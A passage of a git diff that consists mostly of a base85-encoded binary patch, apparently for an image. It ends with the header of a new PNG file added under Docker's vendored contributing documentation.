za9VK|!u7%5<%7@v?-71Ii^=cVe|k;D<RbvrIuFCZKJ3!Np9Yq8&D_HoO#U>iIlXys
zmn#L^7!$4s2&i#<BMD2X2F0stV}5516EL^4vjzwS^n^+EFO5>gZIeAd-+nN>VdaAj
z^va#S$7vXo^>j3h+T(^z6D>vgK@EVJ0Y8{ItwO-%6u(o#WC|RlT_5~SKA`+_pHT4r
z{yv~}fF8;I7gs+H9{@A<Ac_de>v|3nh#)2yV&`cR0ze3MLN)+QYn|YV-f!q0a1e)w
z&FBFDK<q34G$910&%c;a0zRi3RS84|4Kqc3fN-sDSjH@gijovJ#0sxlabt+`MqDu(
z&~CjUHCPA`p7sR*K+qnH*kDMb7#s|Z=mD2wLz%Nw=nM<(={kv^s4&*k;X3D=#vJ?^
zC5a)YD{*OUJ{FNAN$>V0$ufj$WhCwydzI5E1gs_WJ;^9SrvQ;0tWOscJ4*`>ZtdwB
z*m1iWPL~}12_Inc2>?&h2bjI_^s{Gx{pHz>r#CQu@e4~n20%s8>q!h-y0L~xX_zm=
z<lL&agbL%(OhE%`Xt<_fLh%$zTu1|}B?hY{HE%S>Mgb7QHY@8PsOE=jEXK^raB0b8
zOEZ{+=P{h|Ho^eo9@j8IFWz#t6Uk+1S>SQbGV}m~oZdj3UQC9=9<Q;}H+bT=GD*QQ
z%NeDO3HA$ur#9zrn5ZA%JP?OH&0$W<4SRN1nAVKP)k3OR#-Qfq@=2VN(qTT9>o3vj
zey>*r{xua>dMq<a55&B>G!yPIpxiTUfiS^{K1u?Ae3CR{6J|af4sR)*pcIBfeVEeM
z(OBmYIgP-c9t9q2LMWKcHNqQP1UHAnC0tvpVo>QZ)iD>+oHbx_+}H#JEH!d71p@uU
z!5YSI@d0S&J_Xjy6Z8SN_WaKM$7j@AkMG}q{`tLYx6a~^#0QqxL#x)FxCYXOA`1S#
zWa)#PBuR?3+MXDSvEgiGGLg8VZ-9p3K|Qe;n)(2%7H!}(>oDr9p~S`XjMPP}kU%{}
zQbY~~L`#Y-Zy90~5yB+s5Mr!r4%0>ek;zDfeyN23BpHEiZiQvGKIw~HA4=&xNI=&R
zvqMoaLMc&+MaEz^9*c|hh-BCse>66fm?6+KOA3}~iIa+8#P=j|l#TmQI8u)ceJ#C+
zI+oUtbrnM?#-c-gfLcZ#5<;}`&>AJticv%;E&3twd5t{Y;vp&+-J!AOTQP>G(+8kG
zDac77OS72px*|zg$Qg<vrb@QNH)74YWEma1TH7$_>h@4dj7zaPu$SCOvv2l+uQ?A8
z{MbQ=>9tSH2lyX%KEL<l{cGB-$2Ziw&wu&+<M9D+rRAa+73V^F7w1HNNwh*9OPCK^
zvD%K92b?}ewhxRV6V>zMV?Gd5GifnIo2@kTp*qkHeZUGM4-*u_Ru-Cj(N!g?5khcS
z*yzTVO(^%M57@l~z?u~V1aU?V(caP-V@$h;Fyw4klUwz&SKlg?#97r}SK70N*R;ft
zM+pMk2YRQS*7-Iswi{we9vWdYKG34d%!)piIb&Vvup>RqD!d%9RL<ztq$r+9T_X(<
z@<D>&#7g>7Vi=&IF%N)0Mtf~1QF%jOnNg%{WK;v>RDwa3uNy_%xp_TZ9viz%J;5^d
zi7M2|YK(8_MPJu40Re?bz_%oF{>ZF97ZcQsGOwle9DJh>@ESny69BFDPw@SN8<(G6
zd;Ga}=kC4z8_zF)JU)nZJA2GVy=e5(Mj+Kt>N#;J&xsA6Zy2u#Rw~7bE!zk62}XXY
z>;1hClnt5P+iRo(1|J+Ts2t-Dd=Lza*>Qu{i(6vHJ6C3ufsYW<o>#ceq>Ty8**+Kr
z0k$tdO_>D*L$xCqtz~fq!klRP0Pkj?*XYS(V-EQm#?r$&0oe>qTN<W5FqUMm5w=sg
z=<R03a5Bcp0Y$CGf_O_{Tccjg+Ukibpw7!wWL0TL4#)INncdk4Ht5K<4;rEepp-Zd
zVAp6u0&vmNqaYO7>sV3<o>Cv6c5r0yG>3R;72&N3o+}R1u`G&;;k>aP(uHo$!_s<o
z-5cl_sgRNL$-LkZ0|=T1hu-J|HU}X%&d2A2YVX8+0A5^ueCx{NYucS_`}_ZV{89NJ
zWUMIBoYCtTqtQs<bK+R;iOUdq<AsqVj07QIudnbB;G`0@eNcME2RuqzPBU(6!qO&=
z4~P)#i3;tmzP8#@45>kVVE4i+q9w)>Nj&wzLrl-ufXIHmj%Rurz-f^a#|RY-=fRlG
z0Q(Woi8BCsjpoCQMng_=d=Qoo(tKWu)iaTB+3`UcrQ<nqAdjWA#l?2w?RhCAH;j4e
z1Eke;-p6DuB?=FGkTUuZ1&ji0D+xewGN@;AkYp7<GGnu+R0owl0eFKtlE4j1!)Rlo
zZiv=I$-=NPY$;{vtxLwlZ|@I;$Y>&_8j&#Y?FfCNh(JYrs}I1R0V0IJhXl4y&IkLK
z|LgKS?T)iQxOe&I8y}GmqGd}Fo9jktM>G)_r21k*E{U9s(y@w=!Kj*cUT)VjM4l75
zv0=)2W95hsT8P=3VASSAL8~mA67QD=a#;z^i#syv^ZlJZE?M=q5|9ZYwN||t39S<1
z_y7lEHQFilO=d5N5vPZJ^3Yh3T0UP?G{K<{mgKR%?31I0XZH_$u(W0Q<+13oKVJw~
z49Z0^QW%*rG3bd!5@@JYeU1;J^1x8UWkeioAE0G}lff*_6!kG8U`I?L*+(*UjL0a<
zlG6xEizbqHs1NL{M^;C>CB2K#WCH0;7E7bz0IvpgFCu7Qgyf2tTG#V3d?*yesLz+v
z8*ldkJ`Okv26DNVn~@=&mLa0ZPWcZ(2pq4*PT1+d!7kE7kr94RKKS)@KKT5`mH)c(
z<E_U}&)m6l_S&6~#Rt-k+<8zZA-%U|%r?7vw`nv`Qjk(nL#YMyXfvTZ&(s-xCs!9e
zMV<FrdNE{w-gw}H4uV}h+E3_fW1Y|K>gi-mSP4EzkV(Y5Y{kMcp`VK<lFF9z1qWeg
zXsOWlfj&SeuLsxbQURG_3lZ2eGHXLgNCu5z$_QdYnbd(-Zz40cm-C9V?4+)dX_~%X
zuv5cW+Lc0M#qd_+Su<cXSXIz>31%k`22gmw!OR9kwhtoFzA@{GS*!TK2N^4gRUuxa
z*BU`y^kZCBV(E06UykbOURtN3I*q_}eYeMn8O_mlw#4hZO}#V6>m$E!sEa*$pa;wy
zJqHO@cpx`<z!wzD%j*L3&}gg)F%!JS2N;v%;G+Qikp4pCZ7T_}1L7`GzOJ_+{v%ND
zlE~s?fVOdN9%3~9((d4r;V~}dJm)S^6cge%0cwAj51#&dlz#z)VD;|f`&aJXzkKt~
zoyWJ%-239nNAi87)ePrbwgSGjQ6HrgDbBNDArFC>P=su3MoUX^Wrzu-uIx$57`B7)
zSR%9B8_lnbDz*<MU4)Z7ZI%LBG%g7u?;9%d%)>M?vyvqAP*IVj`V!#dQABWUlH1v_
z^#c2&F(RZJk0?b5OCv8WfK*J3Y&B735{XO>?o@mSghn0!LRKWQTLG;OOQs1ElphtQ
zsnW9~B`svCoj6yrgqm-l)81ifZw>`Uo@yo!QC=|1buKN0ePe3~4}8#?RWaxbkw_;A
z*o_2(aV;~lEK3=xElHBn3?`=%9Ee3C*#fY$!<Zywd9owLGkiRSOsTGca!``uQCbUD
zccoY`q0G&1DfRjYo7qTYZyA!e_<+0(1jTO#tL4U%uT_Kz#TVROc=X-&_SZ>_ku3W#
zL5SuMp^5$>*$0q!@j8nE9RS%q&;uZZ7OUsK>Otb`Uij|2?-sW&HqS4PmmY0@^=NVX
z%Ooam0RKHccs-ardxr7Zvv;nkzo`4<qvG(p%5XJY0oV>y(_RdCr44`?ZbM=tB$7)s
zi%F$&Oz-%h8HRpORpAk67Z`gjwE3_K39R*(>|$FxXv^YP_9y*={+%G4nG3U!05%+E
z0XYgR_m75-0m@4?RBqd&;A9yiI(K|<#V~O)Q&^|WzH+L%<aymS>YD(QQwsFY%@c5t
zoe3ua!MHH5;TZ<?#UUb?%=atcU^T-g&}tPv2S~PVuUtO~$=iLv9)}#l0=zVPy&z*O
zYu_q!45W3w&f*hKc;l<Zv`nH@{mCRZSZxoua&0gy1R9NcA}kjdZfmG85tS80aAQ)B
z&R`Ut-5Orsq&^_kxn?+hVbQ2vUl=cKK57(NU;W@kZ+@;kK_47^V{iZL{cHC=-n$tF
zfH-J%kq_!oNC-Hb?I;Tmvb4={z_bn~<1Iumz(=AO9vsN)0Ptv>HYLZ$IIMXC&X5>8
zqhQp}>Rm+M!dtoqG<pg-e(mwgWe03jvD)BBy%Wc<ro_`(y#c4|`8FT0Zv@XgxW3tu
zS&DDCdHqr!uq^6qU-BXO+_nhxMauW)H;aLlg&&Hk#oLVwUtL(-{-%;&xD9gGw->j6
zXvxCD;=<yW$=><x?S%`QJ=z0C^33h++sOkTTr_3o{6Yh<Z-AVv4;<7lE(7xM1N=Lg
z$?%o!GS~Q18q>N(NIozyoQNh*K)Nn$H_>~oJj1Q}t{0OjZ})+A9QF_-e(jlQvn&8C
zn=GsvUy}nLVAfaP{yMPuh)-YKPRF;i{Nf^?*d8rkSg>|B7rD^FZTw*S$uPcne(B52
z4Q}(%oVfiB|MjBd1C7<b-@aJ#`Kb?@n?G#roLl&A9lX&8Gbir@vJXCy=Ld`-{_FoD
z(`om?!2r5CIN2TK@%<r&<j?v*dlO{!+p$boP0fX>8jIolH$AL5KG1x7+vi5xk}M0`
zk-+vj@vBG5gT-NJ;X0AO+}@!+pbz$<tbMb<<tEZ4x-WRL9hJkIn>|eXMb_d4P9_z{
z2MgPD;}8ehn_%DF2QDryZ}kE5CbaUC9T@<&aQ?dxW{8~sCd@K$WBU>W;L^4rY-bVL
z*nTj-dGY+YOV`g|T(#dfV4pZXFt0!A0sLe!eQxp5lg-WCw+miWqwgOOhC%5I3t1Th
z+Xwy4uY`@n7_o1jh~M?W`@qHZfqEQfiV8Na^E+vudHzud!Cv&X0#xdQ#V^DC`h|tY
z?Dn@c=F+z1yR^8N7%eWIlf4VysM>)K%HM8p$>T@gZTxVtQa!&}`f__DcQ0(N5r%jl
zEq>kX<w~CG3yuEfW<iz_qcU&A^}&0<#r1*uW-$Nc_W5|}`lFQ<;r#8aZ4VG!T-c-^
z5$dpcar^eSi;qIS%=SWRu(;ik>F129_U(V9^NZJEaPh*I7q`FfJ^Devy?w#kqQ&pF
zH*>5CCfkcYeD~E4=Zn`D8>L5&)>t*Ez8R+C`rv)w;`$(Y9QBZ-ihRCMY~}i+@wu;u
zGGb^IiC(8XnPoIk{C0Em_7Jl9>rXs$w{Ne3(Dm<CO+U}&=n-enZ*D#?;pF1xxpU_`
zU__5!K51$yPGA4#I_1mU_uquV-#%H=)VJdL;632t`XKpsaF{#)UAlzev`i4iCu_+h
z1g1%l6Ja!j*fPCPsX|!iD3?vYOp++sMlxbmU%Te>A<ga(9l#=_F*GILitB^-gNy5f
z@^O+!C?^^ItA&Myx}80O-KxwG!q~@YaeBhxi5g+;xW*n7S@y8vuVcDCIC)%LAC$}0
z<CI^ailSdFWMTP3;`-n{;NtqA`e#5p4`KB~@~%FpvD$CAxVW&@*ZN?&T5TVvdK9|_
z0aY6OfV`s*%%j)R#l^+{dLOhu391G6^}>nc;=W#>KByh1{gF{?yFNH^TwEW3od30t
zzmJS|b*bt4;Dm8;ec<!tJmzr<9~tJ-GUNK-gmH0wAp2%|Yo7p3Ms|Jhcj4mV{(j>W
z3~VrQadCa%`ha=%FO;*y#l`i3`}@xS{j0;-{Uh51O#T2&J}j8>m(MwN(g~c7$%%2i
z|LH;<sdK@u5B{d#U%33@*|TTAUVcV7+$ON(C>Ybf!-@|JO92S~<#WjKb0Gdx|A`uA
zZ4i8OD^?@_KVV4SJ}qY`=EzB?Ht$i<k-<-|1Q0r08OHU&3H(0OuP*>0`~SRpW1sxS
z{?oh6=hv{EJ9CBBe=xAt%1|cV@?Q`F2xl{tf%?0NGk^G&>U`x$1zg+8P!gfvosRt;
z@)B5_)c*XOv|#t3H(Xv)$*ZX0SFaq)r%9y%ds`*&+pQ2#46(ifnT;Jn+rr*t4xCaQ
zw7CsFM<}3|nS-tmPU!dAZv1@a-oBlo3GDBGaYeg&6VuYY%a4Bncz=H%6TA=T<@*IQ
zR*dIcg1!R@aGn?dq(?w&pmTr#BJeVT2?h3yEuOFI2^ACgvN7<-z4Q_yf|1=4Lc1-n
zM;Y<*G)O^SeZun_k`#u{Sax#a={ms}9+o&`#^+?6hyzA;b~;fE!ON1C=mKW|v@FiQ
zdR4%@6hd}4@L)C&^E_%zP{;_$w3P#|Pl_qa2x-cM#e|@|5rU^v2h2lVQ1r2VTjlj-
z8NuHc0N4pSH!21QO*dVK>je>X8aNei_krt!=bwG{^d~@W{Dko@H^{S}z?G|b|EH&C
zK70IZ|Lo<bXISu$8_%9T!|&Y(4-tgwNJyeeiYsAID22J932@chO__kn6^emot-*x>
zW|srr8gzUhdVP>h>nQ~KT&e)DmX8ii;+1y%;c#!LRZ~0TGRVylqUFMXkdl&}hwY&q
zq^F~zo|mC-Md!4f+2Bl*8&+(mn7dYvXvH1Q4;>$fp}^3D1kVNNL<j{i-ksDcfZ;)O
zodB~pKO7bSm=6q=3F#MLc^qxDnSnU0BF~WP103$t*{!mTNOuMkwl_z#<t3~wd*<g0
zlhIsWY%~IMm^i;37bM7Mij$<3J@5e~8QSK7xPCf)0N3;Zs#p^{8xk9-KoelR936xq
znQLNP$PrI(iL1^GyF~^&kNA9dI1dQuad|ULU||pq5&U)^xITFN`2PLppY7kgvcG@r
zj!OToT;2cd`ThHk??3zT=JQ+6@8ZkP?>|4Y|Ned8Lr5D5Y%eBRMifQGxMf(ia>fv(
z*t}nf#iY0ukHqIm%h(h5Jizh67!gpB5{NUDn3PAnC`ih3U5pPmByrTNi-K79@5XAV
zrw<TeXGJmX7icgu1ExMe@`|47i7`b~l$bGUV*&!AI9c5=Mv_v3whwgC5@UT7Fs!&_
zKRmITpfeE4>r!mbNYkO|M3vQ2T-npRtkq$&5jtvKF_hl26jKb2&Wc{6%+kn+(dm+1
zg=rdf(l=7sNmLYPi=wDV;<7zd*XY~*_j;$^2ViNoAh$<Z?D!y}NMa8~jlEc81!uMh
zO2?VBD8<%=*vJU7_T4982r+5Rz8^@E0CI7<G%d~b!JpV4TsiyV)}6DC4{oXS@5<GG
z+`szcvs?FHTzh=u-qWAYocXUSKdJA1e=t&bp3fK!TpyX3H#`G<pbho)l2nv?;&?SC
zm?0zM&l}^s&Y@nU1rL2dh%jkJI&4i4JW@vvk5Zm^0|)i4pEuTF(HIo<6*(%-147Ds
zEx;Sg&}(#&<AZFP@5Dy!HDk9r)PrTtaDL^ZRaeJ42b)rsVA}^#c3JE!i9GS|)fpOT
z=p3L8gi(d0_0mv}GAY9w6$>c6)wWtay({OfUS2Gft<0(xlvdOFknI|CeW{2EK|`a^
z(52N>#GFjDjf@sDg6+P@BSJt+a^9*yNImU7AQ-hbMn)0YKF~L+J+a$2=mH2<Z8D)g
zh%q}lZ*p{HxseG7C`dzjUgRobuw7Dwq+ppis;|Sh`@r?VnS1x1KK|vX56=92*@@k{
z_4Mf%&p$u&^No9iymuc&1VNCDl|m#l<aoU}kXC(tv4KO4=tIN18js5Uc$cO@+UN#2
zMNsieA7mRk&v99!DTu-GoMy(nC^2Hd-b0AVC|HYi$S6x}Mm*e`rNO;~vp+B_LD(|{
zW=*uE<0ME3NY@FklmX<Gw(SF{2ElBG)6*O`5&eLGR;&!PTwdgSFf0yJ;tcXchAF+?
z&G|K}Rghw>Vi>MR3MFHg<2Ll=w4(Z!#r1*|vL&`8rg%&8Zft3j3204VNDTQjr3GL5
zKrOpI0I1r^7#-I3fwAl>TWL-VLth}$%pUk49bc70#$GyKAU4a5XwXQ7j2x1A!DDa;
zn)KrBK5$<z+}Pj0{HhNw|7^$Z|8(o|&6_u`es<>hPy6rR2i7hCa4ynmib}nnnXC=s
zepC{@eI;I>jo3c$nNI3<M4?{a;+aDqKvUw!x*eOXnJvqZihkP%bw*WqL}f9HI#ymx
z(JWy{JnIBU2R_h?K7gb8ob7^~lcqk<W-}TF=>s3csu;BD1H&F7K_g^VDPxRtVjhBd
zDgx1u!VwOo>XII;S{uGnLNTmnE>c)FEP6_|nYPL(B(8g;Jao*L*z49etS;J`;MN3C
zA0XB70g4(;yG3WWeZ&VCpGF-N)(C_hF$`=UtfRJ-9?;c5T%>>K1AAHWlbD_{0Rdr4
zs?Un4aU=|UJ3`+mB2W=sAN-m9!P9&9uHFCf=9PQ<SEfF=@v|MH`-7|Z?w!4R<MIdc
z0VbHWW=$zA%gqh5d*Fi|u_^b(V(m8{45DI1hEeX|{ez;6a9Yo==pkA5ru!`ul;Vj>
ztSBc0l?Zj>n~^$lUaZIb!0|!aCuHnk3my0X*_ZiaK7i>+#YZwi()NL|Br|)7l%A92
zMq0%Lrs)hk^{5n;<rRHpc;EwWh}yi~-)oh4M#~$~wTKxu2C}@?sqs@EOg~?U8j*ff
zjFhnB1N71dFsE-2<jWaB``uNF&-Ou*A*T<NHs*cujyV6)2SZ~`_O;^XWP(sap+0D%
zaTJz^x)%}DHJ0Uy*jUz!GRO+1nD)ub`q=fs@4k=py3ZRQfA;kGwR=||KfU(zE$98j
zo9azF_V~pYKYxDa>hpin?ZOA}fs)1aC}gyRG0a=BS~TKEJ;OWDx#CDqn-X<F#7^Ck
zkzGsc18Doe$h0~cJwav^B|kJ0^Ws)-ET(6qUC*qbB2MSm62>wr@97;#93SlUI6b{K
zYvgDddF{Ir4C!M!j+}GSfe%D)hz_!&bG9|O2f|8A_s+zu5T^&7j{%I`P)6)O6jOQ2
zQaOYAK;(EMHJ6o4tCQ0^O98!+Gk9|n85d)g+ES<wjF3kRnt%`#(iNttTS=1H!mUU#
zZ{(30b0)}c=-Kf=iib5NzOk_pT&E9(ve1R()B$tG)_T{NXwK)2A=FlQQyQ&vMhhlH
zF0E4^NNp6*yGuM>OXp3VeEmVIU@60nE@%mZ3+*X>e9Q;#_myAr3{W5ZboK6?`*+Xo
z-?(}I=C!-p(<|ENcj=du?%%n4<wx!F`}c2MzIW#4FMzynv_u*cg87Wu4#r~j9!h0v
zFub+AnvE;z;9l=x1I=U)(%6bCQI@s_OIv~<)B|M<d-ZrMI76!>DKW!#lvKCFU}h&K
zSq)6!jvhjUf&)sLod)guoREVAgzM2}CWrb?S_3p5+M6UBN+jkC0=<*nxH7O?$735c
zT2Da3ijBOe@=%iMO`mtG2F*#awkt`Nmjt_@8<S!@vzoPfGrO_aB#Z(<6_zq3EohAq
zA-Fx+0hLS_uzVWkt;BMs1ewGDI``YC5|3w_h}jS*qsClju1s5!(+3_Z65Z*6>GzS!
zi2zz3N%2k_mg+H~mC%N}NvyWwk`l06w}Ww|)v@~KLu-;5VShrBgx;Y?T^~%r0KWtr
zg!cE(zQCC5vp;J4fY2xawD97rUD*G}3w56!$Oiy`=_MehsX^k*7hu2^YLKnc963y|
zN<(;h62;C#t>6cMz;?KRX_GQ*cZZ=r+=c{`*->)ZKB-NE)0<~{N&oOPQLxI`JyqaA
z2@-RLo&Xs-gcG4NFjYtZDa<oRChD25LT7&da0Ot@CJA6olLbx-Od}*Y9Tqsrxw0yQ
z53iatR=Z$gNXrg*I=9mZT>ujULcxdYo^&EW^C#iqjcU%XLZ=P3*Qi_xE+aCj)7FJB
z1IZNE2XExi3`d&*{PGd<!2#g+Q#)FI{VXv6M-NAOf;mA?p~Gg=;G4mC+S8FKyb{3x
zADigQ5|~cn_&=C<{ZPlRhs(=b;&=q$<F~mJ1Z_*|WOOflb!l85xV!{3gB**A%P9a9
z(vx8R*kZdraCr%a5EGYE0e}F)V^P-!E-o%pTpzf&xVS!Wec<A94A%#TxVX5uJ~+h1
z#l`i3i;K$?*9R^xE)K2_$`H7`3!kD-U0ffm&iG$Ls9*57ybFF-V_g0Rp;b?X4_eW#
z%Lx!|tXA7D|AUx09X{x-`d$8h!h<3vF7E4vPtFH36_>xCnSQkVDGI^G^?|?YuTcE|
zue~#HZR5)GxMa<HBT2HQk!GrqZD|xqlC$L;&Th`O1Kdr<-VQe^YQ2H1##UX-DUm!G
zjVyAO)g7e9ZQP`r_V&6>pjRqWKr)7fMquLWKaqtkaA5(G#>B2M1WdQ-)v{&ojcj#Y
z8fd%M;&$UNe$xAW-|zk2yb1I1yZ~6>IQ+46;DttONJ|#b4}V}B1>Yt!YkvGdMEH8l
z<IS(;9Mo;9c>zBI$z<e+2R}m{@c_SNKV#-Nvn?!}I|d%}uqD^8@u(%WKE7nXD2H1j
zcdp@o#lf9x=5NEn@;}ugj~ftfKl-{Ky{Q3WHFy&@FaL8*;LMvdHxB{<zZE=VKH|ZV
zek2|7;6yoo>KJSG-adKb*!qsn%qLk^;5hUd;mj<Kp1|I!7d4(|c|JM+eD?>VwX5s1
z?|b>i?`|`%Ljk-0TN`Il4|yz$Mv@Vh7ql`QTghK%zlzXj66FXen_pYxQMNWaf?R&}
zU#rPv#QRZwn`bMt*CVWFN!jL6)n>+t@-K%4KB+B)0EJdCAMxOa)RB&O(DP{K+Fv&B
zDPI^qnSHAxkXEl;j0ksTa&IIz6R+almAQAdwvcc?O24{lw0*2B9)B<!P#<wz>Q#I*
z^@|6yt?n;m?ZFf_L+(c$j^B1)xtLtaTHIfRgSj^Zj^ABe&1Uzb$o;7L7QZ=plV7r4
zynj<b*<ZY7PTtSijTX*$arLdC;1J@$!tNroG?oj*tKQ8E?nh>G#9*KKm3Mx0*n9iY
zXK10fl3MDk_z@3&Kpp9b2TJ^;vU4Y1y1cHGcFHB?WPJ8|SsCq7YUR>4yHNkoi`v7r
z(#d#fd;Y~=)l2!>N~z~$>Dou}ZQXnv1@V)mof8~~Z|*9n=Upp}DyT%MceE5A?ag=d
z^F62bqj-M!Px1U{>B>TV_7}VPzicc%TvO2U@7{^$e_5LQbA5X`uH@gUZ+qu^x|i!{
zs8mH?qo_X07)2K_di_D^&CT83lghOvMakD9M?Cl;b)+L6Y}0r1?^k->HLY#Y<<f`r
zva(ny)fU9+s{agM&JTOb`Rnt_hiGj3gVF8}dQV+_kiSmv?tIj{?U~Ql9w?{iic(E-
z>|Ldsu3Wx@N-QahWu;2*&iw`fgIVADvaI~WezY<Bo@p(A<5s*Uf9mSS;=Ho$t0=XN
zxi7EoHh7?Hy@$>V%-YsFE6OlkDODR)8yPR%Tbw`tEV|wmrTf^u+0)9_e?)#p=LPCV
zLIm~g{@*N0)BmgV;d1f&{}UXY7rMQb-W!#k>$<hAx68fV!o%I2<xiB}|GgOT3GBv>
z2eo&QA6f3zcrc%@K3t!BpIzH(@?h?L9Cdlli)@*pD~%F=C_giN?B13hC7{P!U->H9
zT|CB?mD)=WN`C<S#$vhj;`#IODss{E#`{54w_4vubFQw<y^W)AZSG5aS-FNXINCH{
zDk-PX%gX5aS7r<G>M`zT!~>6y`KAEId|zSUYoX7>JYL>|>rsIETZ-#6ee)W1%y*UE
z#~iW%IJli}%Rb^k?<rk_2RDwbZT+UKRH=pf;{7)^|ETPE`N*xFDvO#9J;7jJ+2cX&
z>iXR8*?U{d@$Kiz%F_?>HyAYJ<-P0q|6=aEd|Rn8s08B7v5hU?eE#Xm><zZkjB2}E
zZ&Q^xIt;|~wTFlYN;Uka+{N9kcOGu+^MGHiSJ9kfs2nO>-T&I%p^n|Xf@oBqdv|^I
zW;lK2R=k@08Sy}W&H|ZlXiBD-@2Qr-gAwpw@I0;r<p~+#0XSs%@3IiZ4fqa3-g9=O
zNf~@S2_O5ee-#q?qXKofIGAqLf7MSVzAgQT2XVxM_>GEk<+HW?qjG8Xi+iQ&O6f|X
z2fdtE@6NsFU735&yjq_P)wTaW=>9<2IkP_ddv;^%f9i9wdg<v0rAw2$`RgCgT`!k*
zV)eO&`mA-MR4e!H5g?A<2y`bZ&FJY$>E)ub#qZ|L_1V`p7XQ0G*Lp8MTq*tMdTH;x
zu&wbxo6{&)s?IByto7L&E2TH@me3{Lm`9(=%dPdfCFQ5g0|+6Y7z_XiF@~Waq|{c(
zARz-%$UqHXlp3HJOmiAJ0AP&-?Gu28iy^m>3MmRXfPsl1Mp64^0i?5TFG^z?PBUHm
z(z{5wR|^T)h;SonKF5u2qw2o9SDdyuJWU6AtjnHCSta#2*7UUc7)KZ&2C)Oz2DCA7
z(4i;@QBvWlB(-NAj$l|)_XtNpNLz#Z`=lDT7Ep~_-yDXGO+WxZ^FBU#JP_u8J<Q(z
z_2)~U&JEug-6{9}_L&#2c~;kYdS3s0ezdxAja@*E!*6Z;^51&5m!2J7SbMSd$DI?&
zl|@ha{4=j#>aJY+wC7|^|MBHB4{x9Expa}e^-0h9M{k$^eVAQYWN%%{K7UF$@l|x{
z;oVnyUVm-=WR<ypvbu6bcmI=~(JH_2@%hW2&i(n>+Vb<Y$m+8RG>7w6&iDNG`I=Vs
zayPrM{!Gu}yYsJKeE8t<=auu%TpC{fT`ls{<w2NCb?LCdkxbesV_0N58&(4v4=|f0
zP>29-h^4$;EvH=<27x)->gO@cTgZl|S}^7`X|!SbvmIUJI8R~bX|l@$<hH?Vi?1t1
zj!?F-nKs7PMNZ2YrSD32k*dZ6N>^yj_F=$Awi<L4CZP4)q=`988e24Oc#H(e!GTnu
zYwti$wFOd{M%6x$Nn30f<!eikrx`BhDCn>e&DrAtNkeE5Cn=B#1llMHYav_veP)Nj
zgc~}b;3tPXfNQg5$HNSxZ_5DuE9W>r9WdfR4*LL_Q}AHSVF-)lB)f0#eW{QRTgNE<
zS&}@fHydyavkiIWY+#(Fv_!rT$WBlcbvkRX4IqAM`=p*c9>@_BF0+smXc}i}y4-u6
zHZdFyAv6gQIw|m+9N{^9=^w8|DoTw7I0xyZ7s|2^lYJ(HT!E!c@CC2zrEytrqFzYK
zya{_jFDD_2DH%5je1!XJ6yd0szzYISdu5(Z`gAf&!xwbPmEWD&tnaX<Bxg#>928iA
z<2e0Gz(gm}GT3vhY=#g(vjEJf0H-&>=d@JrCn`BjiaEQOf&s~qlX7gtF6Eq(#sd&0
z+)=5>6vPQ=BeF5Vk?vESK_ZHKLedP%F`=1mXPaIn+H>M0u&IPy>ZHa+2XQta+EvMK
zB#3i-LbN;FQy?X(?L<!FfzB$~oo;!=;fhL~dUH-&k2IykoXc?*Fjz~Da1Zqps$C2)
zNLUsvBAxb&4rj(FscvEjrbK&AoHjTJyO0%Ukb^aNkOBxGV{V;aQteU-X4+k-1m_rv
z*c~IXc5P4T3zEa(cFM3tBKMtf$wBmo96@4+O%no|6O}?dbtr$5B{pNt`Lv$TD&`zS
z2$0%7EmL9|Vx6u5)g6>B_!_4xDd;9n!>o2k?O2=BZI`UNCyWQJVVvV+t|3`Q?L_%s
zx^c~E{-E)__MmsP_f58$*i<vI*?X*Q-ZzjAmOhv++#h}MmCF}#%{(yY@%0aMeyWmF
z(HMrEi!v$Ej~S&*Rx~h1vB87v3{G2!q(K^l$DKyK8UQh(1NKXnf;g@(h~%J@0+C#l
z&AB>!o$X1h%VwIE+6<z#C7BD*UNr_L$C!S}XtK4(2Bd^;%BArD_KRr{mdK(iLyOo?
zN?nXa%yvj5z-NL!iopgPZM-|kQvqoN;lW09>Nr<yT#U&RM1tX?Gs$28>Z9jix;-*T
z1gK<m#!Kz<fPt;fDObqLOiCRg*Kul+=xDbDT>~)IK1KV*{(iAj?ia^ti!?RaK4J2U
zLz)woEOf@6u{h+Ss}CB*0z8b<!nhPBRiD-~h*_qMxZo)!AT>7Ti`w;ON5C(3(f+86
zF<75#obDrxGBN2LblX|Gii5P+2A?b*WQ}J0YcdO70e_s#7(4PAz<(^6*{g#c@33b4
z??fD#87Hl-F(%;lnnsBJVvxZ+ZjA?&P{>Z^98DeoH9)yzkn*XMt!@v{tK_(tNT;KO
ztWH9c(b?k8rOAMp?nmiZhd<RxBw%6;OGzm*?apNh8-xK>;{i!TFls8}Oq(#l85j#;
zfOll4#a1$HcSaBo1|8uEX&iznVj3cPNL`S!$<xGfx**2V*`UPP{3)x$3N7uvX>n3>
zWUR>p(AsVwh9DdvrqLcSVW6*_5REjes%bJMrVT^}aq203FvuTpWS7G_J^|B?2?q%=
z-a#G$574etbZUm8G^V+d01FkVL2aKQXpsgD(#VM9PV~1la>LVskmT=@Mj#!qAD4^}
z$mrt<dp}4R!<p}<k%7Ufk<5>%iNVa@k492OB5KWPJV?SY(I4!jD4p8iL0ZanhW2>S
z;xuAvz~>4;G#Il+b(C+0oEC${VrWuOCjqoLZEkn5SiCS~kd6a9N{q!^8V{IODTv$@
z>BK3R)_8!mI+7Hln;@nkB{)*{7)E*BS!1JCf<@yKj&PVb3$Q7|4;g46!hq3HenK{l
zOLmkKYbg@JnA(YWpqrMW$gv7k^St1*M+-y-fDB=5Cjq1Pa1Pa-i+EL65heB;&=?Fj
z+6cc-b!*O$ffxXoZ89ghI<k(8c1_7c;Q<VY(U99&>;MdisX7W+i+qTP#?%mKAuKV~
z1I~7;qP-78_s88{j1m5Va}a|8`-EhGm`prDJOFycgH$3LNc<Q&k`#cjGuY(8Ih6;p
zQ{#azSM<?-?Yv-vVF~ddg{c=9%<O0lv_~-9K^CMblgSWZ8$2NT+*SyalNpq5>Jq0-
z%*-TA6tOfRKwvTYrPGi(r||%0i9Rf14<NRHjFb-9J>WQz9hU}8a6IMP<AIH^KxmK*
zfPq6&0s1;y{Y0P1Ahpr-P@qk+n6Mz?flD_og=xCKRoCPJ7!t_=$q%7lGPq+DoVIs3
z`U_&(H**d^T_U6L0E{^8E?K8OweJkTk%ZTWidq~tS1X1MN|wXm!FVVXaudY~fY3l3
zhivXbhiHNDLXl#Msw-tGq%hVf8XyC+(rH?7PPb_<PM!8Xf<#*q$DbS?K->QT_kcmW
TmoUm+00000NkvXXu0mjf*nsb{

literal 0
HcmV?d00001

diff --git a/vendor/github.com/docker/docker/docs/contributing/images/contributor-edit.png b/vendor/github.com/docker/docker/docs/contributing/images/contributor-edit.png
new file mode 100644
